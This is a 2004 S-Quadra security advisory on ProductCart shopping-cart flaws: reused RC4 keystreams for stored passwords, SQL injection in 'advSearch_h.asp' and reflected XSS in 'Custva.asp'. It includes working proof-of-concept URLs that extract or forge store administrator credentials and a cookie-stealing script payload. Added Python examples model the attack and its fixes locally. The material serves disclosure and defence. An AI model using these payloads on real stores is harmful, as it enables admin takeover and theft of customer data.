Adv-20040216.txt

Posted Feb 18, 2004
Authored by Nick Gudov | Site s-quadra.com

S-Quadra Advisory #2004-02-16 - EarlyImpact ProductCart shopping cart software incorrectly makes use of cryptography, is susceptible to a cross site scripting attack, and allows for SQL injection attacks as well.

tags | exploit, xss, sql injection
SHA-256 | 3330d8b93aad8afb29f6c2680fb973686c8aec2837cc6efd89d60eb6b3d896ca

      S-Quadra Advisory #2004-02-16

Topic: EarlyImpact ProductCart shopping cart software multiple security
vulnerabilities
Severity: High
Vendor URL: https://www.earlyimpact.com
Advisory URL: https://www.s-quadra.com/advisories/Adv-20040216.txt
Release date: 16 Feb 2004

1. DESCRIPTION

ProductCart is a shopping cart application for e-commerce enabled
sites. It is written in ASP, runs on most Windows platforms and uses MS
Access or MS SQL Server as a backend. Please visit
https://www.earlyimpact.com for information about ProductCart shopping cart.

2. DETAILS

-- Vulnerability 1: Incorrect use of cryptography

ProductCart uses a stream cipher (possibly RC4) to encrypt various
passwords before storing them in the database. A stream cipher generates
a keystream (a sequence of bits used as the key) and encrypts by
combining the keystream with the plaintext using the bitwise XOR
operation; the keystream depends only on the key, not on the plaintext
or the ciphertext. ProductCart uses a single cryptographic key to encrypt
all customer and store administrator passwords, so every stored password
is XORed with the same keystream. An attacker can therefore mount a
chosen-plaintext attack: registering a customer with a password of his
own choosing and XORing that password with its stored ciphertext yields
the first 100 bytes of the keystream (100 bytes being the maximum length
of a customer password). With those bytes the attacker can decrypt any
encrypted value in the database, including the store administrator
password.

-- Vulnerability 2: SQL Injection vulnerability

An SQL injection vulnerability has been found in the 'advSearch_h.asp'
script.

Improper filtering of user-supplied input allows an attacker to modify
the SQL query and perform several kinds of SQL injection attacks (the
proof of concept below injects through the 'priceUntil' parameter).

Successful exploitation of this vulnerability could allow an attacker
to gain administrative access to the ProductCart store and read any
information from the store database (e.g. customers' private data). With
an MS SQL Server backend the attacker could also execute arbitrary
operating system commands through the xp_cmdshell extended stored
procedure.

-- Vulnerability 3: Cross Site Scripting vulnerability in 'Custva.asp'

By injecting specially crafted JavaScript code into the URL (the
'redirectUrl' parameter, see the proof of concept below) and tricking a
user into visiting it, a remote attacker can steal the user's session id
and gain access to the user's personal data.

-- PoC code

--Vulnerability 1 and 2:

Platform: MS SQL Server as a backend
ProductCart uses its cryptographic algorithm incorrectly to protect the
store administrator password. Combining this error with the SQL
injection vulnerability allows an attacker to gain administrative access
to the store.

By performing the following scenario an attacker can find the store
administrator username and password.

Scenario:

1. The attacker registers a new customer in the store, entering
'987654' in the 'Postal Code' field of the registration form and
choosing a long password (it must be longer than the store
administrator's password, so that the recovered keystream covers the
whole of it).

2. The attacker performs the following request:

https://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;u--pdate%20customers%20set%20name=(s--elect%20top%201%20idadmin%20from%20admins),lastName=(s--elect%20top%01%20adminpassword%20from%20admins),phone=(s--elect%20password%20from%20customers%20where%20zip=987654)%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&



3. The attacker goes to https://[target]/productcart/pc/Custmoda.asp
and reads his personal information. The value of the "First Name" field
in this form is now the store administrator's login name. The store
administrator's password follows from this formula:

adminpass = (Last Name) xor (Phone) xor (customer login password from
scenario step 1)

This works because the injected update copied the encrypted
administrator password into 'Last Name' and the attacker's own encrypted
password into 'Phone'. Both values were encrypted under the same
keystream, so XORing them cancels the keystream, and XORing the result
with the known customer password leaves the administrator password in
the clear.
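The following is an added example, not ProductCart's code and not part of the original advisory. It models the first scenario end to end, and so serves both Vulnerability 1 (keystream reuse) and Vulnerability 2 (the stacked-query injection in 'advSearch_h.asp'). Its assumptions: passwords are encrypted with RC4 under one store-wide key and no per-record nonce (the advisory only says "possibly RC4"), the search handler concatenates 'priceUntil' straight into its SQL text, and the backend executes stacked statements (MS SQL Server does; sqlite3's executescript() stands in for it here, with T-SQL 'top 1' rewritten as 'limit 1'). The key, the table layouts and the sample passwords are constructed; table and column names follow the advisory's payload.

```python
import sqlite3

# Assumption: one store-wide key reused for every password, which is the defect
# the advisory describes. The value itself is made up for this example.
KEY = b"store-wide-fixed-key"


def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Same key => same keystream on every call."""
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def xor(a: bytes, b: bytes) -> bytes:
    """Bytewise XOR, truncated to the shorter input."""
    return bytes(x ^ y for x, y in zip(a, b))


def build_search_sql(price_until: str) -> str:
    """Vulnerable builder: the parameter is concatenated into the query text."""
    return f"select * from products where price <= {price_until}"


def build_search_sql_safe(price_until: str):
    """Hardened builder: type-check the value, then pass it as a bound parameter."""
    if not price_until.isdigit():
        raise ValueError("priceUntil must be a non-negative integer")
    return "select * from products where price <= ?", (int(price_until),)


def setup_store(admin_password: bytes) -> sqlite3.Connection:
    """In-memory store with the tables and columns named in the advisory's payload."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        create table products(id integer, price integer);
        create table admins(idadmin text, adminpassword blob, adminlevel text);
        create table customers(name text, lastName text, phone text, password blob, zip text);
    """)
    db.execute("insert into admins values (?, ?, ?)",
               ("storeadmin", rc4(KEY, admin_password), "1"))
    return db


def register_attacker(db, attacker_password: bytes) -> None:
    """Step 1: a customer with postal code 987654 and a long, attacker-chosen password."""
    db.execute("insert into customers values (?, ?, ?, ?, ?)",
               ("mallory", "m", "555", rc4(KEY, attacker_password), "987654"))


def keystream_prefix(db, attacker_password: bytes) -> bytes:
    """Vulnerability 1 on its own: known plaintext XOR its ciphertext = the keystream prefix."""
    (ct,) = db.execute("select password from customers where zip='987654'").fetchone()
    return xor(ct, attacker_password)


def inject(db) -> None:
    """Step 2: the advisory's stacked payload, delivered through the vulnerable builder."""
    payload = ("999;update customers set "
               "name=(select idadmin from admins limit 1),"
               "lastName=(select adminpassword from admins limit 1),"
               "phone=(select password from customers where zip='987654') "
               "where zip='987654';select * from products where 1=1")
    db.executescript(build_search_sql(payload))  # every stacked statement runs


def recover_admin(db, attacker_password: bytes):
    """Step 3: read the profile and apply adminpass = LastName xor Phone xor own password."""
    name, last_name, phone = db.execute(
        "select name, lastName, phone from customers where zip='987654'").fetchone()
    return name, xor(xor(last_name, phone), attacker_password)


def safe_builder_rejects(value: str) -> bool:
    """True if the hardened builder refuses the value (no query text is ever built)."""
    try:
        build_search_sql_safe(value)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    store = setup_store(b"s3cret")
    register_attacker(store, b"attacker-chosen-long-password")
    inject(store)
    print(recover_admin(store, b"attacker-chosen-long-password"))  # ('storeadmin', b's3cret')
```

The hardened builder shows the two checks that break the chain: rejecting anything that is not an integer means no SQL text is ever assembled from the parameter, and binding the value as a parameter means the database never sees a second statement. Neither fixes Vulnerability 1, which needs a per-record nonce or a proper password hash rather than a reversible cipher under one key.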

In the following scenario an attacker can add a new administrator to the
store.

Scenario:

1. The attacker registers a new customer in the store with the 'First
Name' field set to '1*2*3*4*5*6*7*8*9*10*', the 'Last Name' field set to
'34567', the 'Password' field set to '111' and the 'Postal Code' field
set to '987654'.

2. The attacker performs the following request:

https://[target]/productcart/pc/advSearch_h.asp?idcategory=0&idSupplier=10&customfield=0&priceUntil=999;in--sert%20into%20admins%20(idadmin,%20adminpassword,%20adminlevel)%20s--elect%20lastName,%20password,%20name%20from%20customers%20where%20zip=987654;s--elect%20*%20from%20products%20where%201=1&Submit.y=13&priceFrom=0&sku=&keyWord=dark&IDBrand=0&resultCnt=200&Submit.x=33&



3. The attacker logs into the store admin interface with username
'34567' and password '111'. The password works because the injected
insert copies the attacker's encrypted customer password verbatim into
'adminpassword', and both tables use the same key, so it decrypts to
'111'.

-- Vulnerability 3:

https://[target]/productcart/pc/Custva.asp?redirectUrl="><script>alert(document.cookie)</script><"
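The following is an added example, not ProductCart's code and not part of the original advisory. It takes the advisory's payload above and reflects it into a double-quoted attribute the way a vulnerable page would, then the way a fixed page would, and parses the result to count the script elements a browser would execute. The hidden-input context is an assumption (the leading '">' of the payload implies an attribute context like it); the advisory does not say where 'Custva.asp' echoes 'redirectUrl'.

```python
import html
from html.parser import HTMLParser

# The advisory's payload, as supplied in the redirectUrl query parameter.
PAYLOAD = '"><script>alert(document.cookie)</script><"'


def render_hidden_field(redirect_url: str, escape: bool) -> str:
    """Reflect redirectUrl into a double-quoted attribute, raw (vulnerable) or
    HTML-escaped (fixed). The hidden <input> is an assumed context for the echo."""
    value = html.escape(redirect_url, quote=True) if escape else redirect_url
    return f'<form><input type="hidden" name="redirectUrl" value="{value}"></form>'


class _Scan(HTMLParser):
    """Counts <script> elements and records the parsed redirectUrl attribute value."""

    def __init__(self):
        super().__init__()
        self.script_tags = 0
        self.redirect_value = None

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.script_tags += 1
        attrs = dict(attrs)
        if tag == "input" and attrs.get("name") == "redirectUrl":
            self.redirect_value = attrs.get("value")


def analyse(markup: str):
    """Return (number of script elements, value the browser assigns to redirectUrl)."""
    scan = _Scan()
    scan.feed(markup)
    scan.close()
    return scan.script_tags, scan.redirect_value


if __name__ == "__main__":
    # Raw reflection: the payload closes the attribute and the tag, and a script
    # element follows; the field itself is left empty.
    print(analyse(render_hidden_field(PAYLOAD, escape=False)))  # (1, '')
    # Escaped reflection: no script element; the whole payload stays inert data
    # inside the attribute.
    print(analyse(render_hidden_field(PAYLOAD, escape=True)))   # (0, PAYLOAD)
```

The fix is attribute-context output encoding at the point of reflection, here html.escape() with quote=True so that the double quote is encoded as well as the angle brackets; encoding only the angle brackets would still let a payload break out of the attribute.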



3. FIX INFORMATION

S-Quadra alerted the EarlyImpact development team to these issues on 29
January 2004.

4. CREDITS

Nick Gudov <cipher@s-quadra.com> is responsible for discovering these
issues.

5. ABOUT

S-Quadra offers services in computer security, penetration testing and
network assessment, web application security, source code review and
third party product vulnerability assessment, forensic support and
reverse engineering.

S-Quadra Advisory #2004-02-16